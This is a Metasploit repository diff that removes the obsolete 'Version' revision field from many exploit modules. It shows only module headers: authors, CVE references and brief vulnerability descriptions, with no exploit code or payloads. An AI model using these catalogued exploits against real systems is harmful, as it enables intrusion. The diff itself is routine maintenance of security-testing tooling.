a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '40521' ], diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb index 9f203c09c8..1e2ff45fc4 100644 --- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb +++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'gat3way', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2765' ], diff --git a/modules/exploits/linux/http/gpsd_format_string.rb b/modules/exploits/linux/http/gpsd_format_string.rb index 7480062360..786989bff5 100644 --- a/modules/exploits/linux/http/gpsd_format_string.rb +++ b/modules/exploits/linux/http/gpsd_format_string.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Yann Senotier ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1388' ], diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index 05a422462d..ab6a11aa53 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Raphael Rigo ', 'Julien Tinnes ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2799'], diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb index 18fe402d38..26a9d84bb5 100644 --- a/modules/exploits/linux/http/peercast_url.rb +++ b/modules/exploits/linux/http/peercast_url.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-1148'], diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index 8474a904f4..d87027cadb 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # Default password diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index 610c3dda19..673db6bc4f 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'EDB', '17487' ], [ 'URL', 'http://www.webidsupport.com/forums/showthread.php?3892' ] ], - 'Version' => '$Revision$', 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index 731b59e1cb..c1840dcc11 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Brendan Coles ', # Discovery and exploit ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Privileged' => false, 'Arch' => ARCH_CMD, 'Platform' => 'unix', diff --git a/modules/exploits/linux/ids/snortbopre.rb b/modules/exploits/linux/ids/snortbopre.rb index 091f8c0e45..06b05869f3 100644 --- a/modules/exploits/linux/ids/snortbopre.rb +++ b/modules/exploits/linux/ids/snortbopre.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'KaiJern Lau ', 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-3252'], diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb index 462d157ffe..b51409b501 100644 --- a/modules/exploits/linux/imap/imap_uw_lsub.rb +++ b/modules/exploits/linux/imap/imap_uw_lsub.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick', 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2000-0284' ], diff --git a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb index 560bd8e576..f83ab68a01 100644 --- a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb +++ b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb @@ -53,7 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Laurent Butti <0x9090 at gmail.com>' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-6332'], diff --git a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb index a6d44e62c7..fe6bcb3d62 100644 --- a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb +++ b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '71362'], diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index 2687316eda..2853947ced 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'joernchen ' ], #(Phenoelit) 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ], diff --git a/modules/exploits/linux/misc/gld_postfix.rb b/modules/exploits/linux/misc/gld_postfix.rb index 1f8d9b3dff..2b02a36531 100644 --- a/modules/exploits/linux/misc/gld_postfix.rb +++ b/modules/exploits/linux/misc/gld_postfix.rb @@ -22,7 +22,6 @@ require 'msf/core' GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten. }, - 'Version' => '$Revision$', 'Author' => [ 'patrick' ], 'Arch' => ARCH_X86, 'Platform' => 'linux', diff --git a/modules/exploits/linux/misc/hplip_hpssd_exec.rb b/modules/exploits/linux/misc/hplip_hpssd_exec.rb index f8f3142ffe..47a4d023ea 100644 --- a/modules/exploits/linux/misc/hplip_hpssd_exec.rb +++ b/modules/exploits/linux/misc/hplip_hpssd_exec.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5208' ], diff --git a/modules/exploits/linux/misc/ib_inet_connect.rb b/modules/exploits/linux/misc/ib_inet_connect.rb index babd37b9cf..4f7ff8799f 100644 --- a/modules/exploits/linux/misc/ib_inet_connect.rb +++ b/modules/exploits/linux/misc/ib_inet_connect.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/linux/misc/ib_jrd8_create_database.rb b/modules/exploits/linux/misc/ib_jrd8_create_database.rb index 567d95e89b..923f55b27c 100644 --- a/modules/exploits/linux/misc/ib_jrd8_create_database.rb +++ b/modules/exploits/linux/misc/ib_jrd8_create_database.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/linux/misc/ib_open_marker_file.rb b/modules/exploits/linux/misc/ib_open_marker_file.rb index 4ede29bbcd..99a7ccd5a0 100644 --- a/modules/exploits/linux/misc/ib_open_marker_file.rb +++ b/modules/exploits/linux/misc/ib_open_marker_file.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb index 83e8ef86fe..4de10b35a2 100644 --- a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb +++ b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/exploits/linux/misc/lprng_format_string.rb b/modules/exploits/linux/misc/lprng_format_string.rb index 0e105034c3..29ccfd9b54 100644 --- a/modules/exploits/linux/misc/lprng_format_string.rb +++ b/modules/exploits/linux/misc/lprng_format_string.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2000-0917' ], diff --git a/modules/exploits/linux/misc/netsupport_manager_agent.rb b/modules/exploits/linux/misc/netsupport_manager_agent.rb index e005fedec7..fd38166282 100644 --- a/modules/exploits/linux/misc/netsupport_manager_agent.rb +++ b/modules/exploits/linux/misc/netsupport_manager_agent.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Arch' => ARCH_X86, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-0404' ], diff --git a/modules/exploits/linux/mysql/mysql_yassl_getname.rb b/modules/exploits/linux/mysql/mysql_yassl_getname.rb index 1db722b7b3..9735c19234 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_getname.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_getname.rb @@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4484' ], diff --git a/modules/exploits/linux/mysql/mysql_yassl_hello.rb b/modules/exploits/linux/mysql/mysql_yassl_hello.rb index 77e5741a09..744e4b6d57 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_hello.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0226' ], diff --git a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb index 38ef7f4e8e..6b1f381c96 100644 --- a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb +++ b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'bannedit', 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2502' ], diff --git a/modules/exploits/linux/pptp/poptop_negative_read.rb b/modules/exploits/linux/pptp/poptop_negative_read.rb index 18e6073b0f..9f4968e534 100644 --- a/modules/exploits/linux/pptp/poptop_negative_read.rb +++ b/modules/exploits/linux/pptp/poptop_negative_read.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'spoonm', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2003-0213'], diff --git a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb index efb934d755..39d9cb273f 100644 --- a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb +++ b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote defined length. Props to iDEFENSE for the advisory. }, 'Author' => 'skape', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0541'], diff --git a/modules/exploits/linux/samba/chain_reply.rb b/modules/exploits/linux/samba/chain_reply.rb index 4696a1efd3..37566faa9d 100644 --- a/modules/exploits/linux/samba/chain_reply.rb +++ b/modules/exploits/linux/samba/chain_reply.rb @@ -45,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2063' ], diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb index 71c020251c..bd903892bf 100644 --- a/modules/exploits/linux/samba/lsa_transnames_heap.rb +++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2446'], diff --git a/modules/exploits/linux/samba/trans2open.rb b/modules/exploits/linux/samba/trans2open.rb index 28b713e735..5ed46e581c 100644 --- a/modules/exploits/linux/samba/trans2open.rb +++ b/modules/exploits/linux/samba/trans2open.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0201' ], diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 61e982f420..9ff787e252 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, { 'Name' => 'F5 BIG-IP SSH Private Key Exposure', - 'Version' => '$Revision$', 'Description' => %q{ F5 ships a public/private key pair on BIG-IP appliances that allows passwordless authentication to any other BIG-IP box. Since the key is diff --git a/modules/exploits/multi/browser/firefox_escape_retval.rb b/modules/exploits/multi/browser/firefox_escape_retval.rb index 63892f737c..606e6c901f 100644 --- a/modules/exploits/multi/browser/firefox_escape_retval.rb +++ b/modules/exploits/multi/browser/firefox_escape_retval.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Simon Berry-Byrne ', # Author / Publisher / Original exploit 'hdm', # Metasploit conversion ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2009-2477'], diff --git a/modules/exploits/multi/browser/firefox_queryinterface.rb b/modules/exploits/multi/browser/firefox_queryinterface.rb index 6f9a27af43..87a0261347 100644 --- a/modules/exploits/multi/browser/firefox_queryinterface.rb +++ b/modules/exploits/multi/browser/firefox_queryinterface.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['hdm'], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-0295'], diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb index 337b43f806..077b0b9b8b 100644 --- a/modules/exploits/multi/browser/itms_overflow.rb +++ b/modules/exploits/multi/browser/itms_overflow.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Will Drewry ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0950' ], diff --git a/modules/exploits/multi/browser/java_calendar_deserialize.rb b/modules/exploits/multi/browser/java_calendar_deserialize.rb index 9fdc45cad0..6ca8e97f5f 100644 --- a/modules/exploits/multi/browser/java_calendar_deserialize.rb +++ b/modules/exploits/multi/browser/java_calendar_deserialize.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'sf', 'hdm' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5353' ], diff --git a/modules/exploits/multi/browser/java_getsoundbank_bof.rb b/modules/exploits/multi/browser/java_getsoundbank_bof.rb index 1b46303add..63f65c2b39 100644 --- a/modules/exploits/multi/browser/java_getsoundbank_bof.rb +++ b/modules/exploits/multi/browser/java_getsoundbank_bof.rb @@ -39,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote 'kf', # Original PoC/exploit 'jduck' # metasploit version ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3867' ], diff --git a/modules/exploits/multi/browser/java_rmi_connection_impl.rb b/modules/exploits/multi/browser/java_rmi_connection_impl.rb index e258a9ecf4..c3020043fb 100644 --- a/modules/exploits/multi/browser/java_rmi_connection_impl.rb +++ b/modules/exploits/multi/browser/java_rmi_connection_impl.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Matthias Kaiser', # PoC 'egypt' # metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0094' ], diff --git a/modules/exploits/multi/browser/java_setdifficm_bof.rb b/modules/exploits/multi/browser/java_setdifficm_bof.rb index 5877ddac3e..a914ff59f8 100644 --- a/modules/exploits/multi/browser/java_setdifficm_bof.rb +++ b/modules/exploits/multi/browser/java_setdifficm_bof.rb @@ -38,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3869' ], diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index 5825698915..dc01bdc41a 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -38,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'natron' ], - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ], diff --git a/modules/exploits/multi/browser/java_trusted_chain.rb b/modules/exploits/multi/browser/java_trusted_chain.rb index 160caf0678..5075220eb9 100644 --- a/modules/exploits/multi/browser/java_trusted_chain.rb +++ b/modules/exploits/multi/browser/java_trusted_chain.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Matthias Kaiser', # PoC 'egypt' # metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0840' ], diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb index bf57ea5d00..e5d6f0fc81 100644 --- a/modules/exploits/multi/browser/mozilla_compareto.rb +++ b/modules/exploits/multi/browser/mozilla_compareto.rb @@ -38,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'Aviv Raff '], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2265'], diff --git a/modules/exploits/multi/browser/mozilla_navigatorjava.rb b/modules/exploits/multi/browser/mozilla_navigatorjava.rb index 2fa9337ecc..66dd676e5f 100644 --- a/modules/exploits/multi/browser/mozilla_navigatorjava.rb +++ b/modules/exploits/multi/browser/mozilla_navigatorjava.rb @@ -38,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['hdm'], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3677'], diff --git a/modules/exploits/multi/browser/opera_configoverwrite.rb b/modules/exploits/multi/browser/opera_configoverwrite.rb index 1d173ad126..f0e9534b78 100644 --- a/modules/exploits/multi/browser/opera_configoverwrite.rb +++ b/modules/exploits/multi/browser/opera_configoverwrite.rb @@ -39,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'egypt', # stolen from mpack ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '66472'], diff --git a/modules/exploits/multi/browser/opera_historysearch.rb b/modules/exploits/multi/browser/opera_historysearch.rb index f5b461e90b..2b0af53a2e 100644 --- a/modules/exploits/multi/browser/opera_historysearch.rb +++ b/modules/exploits/multi/browser/opera_historysearch.rb @@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Aviv Raff ', # showed it to be exploitable for code exec 'egypt', # msf module ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-4696'], diff --git a/modules/exploits/multi/browser/qtjava_pointer.rb b/modules/exploits/multi/browser/qtjava_pointer.rb index 60d62d71c0..45e5d24a54 100644 --- a/modules/exploits/multi/browser/qtjava_pointer.rb +++ b/modules/exploits/multi/browser/qtjava_pointer.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'kf', # Added support for Mac OS X X86 'ddz' # Discovered bug, provided tips ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2175'], diff --git a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb index 7c532c3dff..6479583f8a 100644 --- a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb +++ b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Felipe Andres Manzano ', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2990' ], diff --git a/modules/exploits/multi/fileformat/maple_maplet.rb b/modules/exploits/multi/fileformat/maple_maplet.rb index 215ffd5acf..ba2e08299b 100644 --- a/modules/exploits/multi/fileformat/maple_maplet.rb +++ b/modules/exploits/multi/fileformat/maple_maplet.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'scriptjunkie' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64541'], diff --git a/modules/exploits/multi/fileformat/peazip_command_injection.rb b/modules/exploits/multi/fileformat/peazip_command_injection.rb index 27511c48fd..46715783ae 100644 --- a/modules/exploits/multi/fileformat/peazip_command_injection.rb +++ b/modules/exploits/multi/fileformat/peazip_command_injection.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Nine:Situations:Group::pyrokinesis', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2261' ], diff --git a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb index ef36adf7b7..b0335b8fd0 100644 --- a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb +++ b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote specifiers, an attacker can corrupt memory and execute arbitrary code. }, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2000-0573'], diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index bec2c1ed89..bf541b1d47 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['hdm'], - 'Version' => '$Revision$', 'References' => [ ], 'Payload' => { diff --git a/modules/exploits/multi/http/freenas_exec_raw.rb b/modules/exploits/multi/http/freenas_exec_raw.rb index 71e2dec71e..94f76a22c1 100644 --- a/modules/exploits/multi/http/freenas_exec_raw.rb +++ b/modules/exploits/multi/http/freenas_exec_raw.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ], diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index c0b81a7406..33a034e39c 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote this module will try to bypass authentication instead by sending lowercase HTTP verbs. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ #Msf module for Glassfish 3.0 diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index dee3dfbf6c..fd14dd671d 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'h0ng10' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0738' ], # using a VERB other than GET/POST diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 09da6021f2..6b42a7312d 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'Jacob Giannantonio', 'Patrick Hof', 'h0ng10' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0738' ], # by using VERB other than GET/POST diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index f3f636acfb..a978dc9db6 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck', 'Patrick Hof', 'h0ng10'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1036' ], diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 70693a7084..9ee87e5756 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jjarmoc' #added URI encoding obfuscation ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE' , '2012-1823' ], [ 'OSVDB', '81633'], diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index 32690eb7ce..b1c359289d 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'TecR0c ', # msf ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-4075'], diff --git a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb index 7ed607abcf..1ebb9d5a24 100644 --- a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb +++ b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ], 'Privileged' => false, 'Payload' => diff --git a/modules/exploits/multi/http/phpscheduleit_start_date.rb b/modules/exploits/multi/http/phpscheduleit_start_date.rb index f0ca25447a..e6b13c6427 100644 --- a/modules/exploits/multi/http/phpscheduleit_start_date.rb +++ b/modules/exploits/multi/http/phpscheduleit_start_date.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'juan vazquez' # Metasploit module ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-6132'], diff --git a/modules/exploits/multi/http/snortreport_exec.rb b/modules/exploits/multi/http/snortreport_exec.rb index 9e58133e04..f4dc3edbaa 100644 --- a/modules/exploits/multi/http/snortreport_exec.rb +++ b/modules/exploits/multi/http/snortreport_exec.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Paul Rascagneres' #itrust consulting during hack.lu 2011 ], - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '67739'], diff --git a/modules/exploits/multi/http/spree_search_exec.rb b/modules/exploits/multi/http/spree_search_exec.rb index 6e58b77c77..e48e1148b7 100644 --- a/modules/exploits/multi/http/spree_search_exec.rb +++ b/modules/exploits/multi/http/spree_search_exec.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'joernchen ' ], #Phenoelit 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '76011'], diff --git 